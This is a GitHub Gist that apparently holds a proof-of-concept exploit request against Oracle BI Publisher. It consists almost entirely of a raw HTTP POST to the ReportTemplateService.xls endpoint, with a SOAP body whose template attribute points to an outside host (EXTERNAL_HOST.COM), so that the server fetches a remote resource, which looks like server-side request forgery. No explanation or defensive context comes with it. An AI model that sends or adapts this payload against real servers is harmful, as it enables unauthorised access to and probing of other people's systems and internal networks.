Created
September 13, 2021 09:57
-
-
Save testanull/3d189555a62b41c65629c508b7a740dc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 | |
Host: 192.168.139.212 | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: text/xml | |
Content-Length: 1317 | |
<?xml version="1.0"?> | |
<soap-env:Envelope | |
soap-env:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' | |
xmlns:soap-enc='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap-env='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/1999/XMLSchema' xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' > | |
<soap-env:Body > | |
<sg:replyToXML xmlns:sg="http://xmlns.oracle.com/oxp/service/service_gateway"> | |
<incomingXML xsi:type='xsd:string'><?xml version = "1.0"?><xdoservice:method xmlns:xdoservice="http://xmlns.oracle.com/oxp/service" template="http://EXTERNAL_HOST.COM" name="validateLogin"><xdoservice:param xmlns:xdoservice="http://xmlns.oracle.com/oxp/service" value="asasdasd"></xdoservice:param></xdoservice:method></incomingXML> | |
</sg:replyToXML> | |
</soap-env:Body> | |
</soap-env:Envelope> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment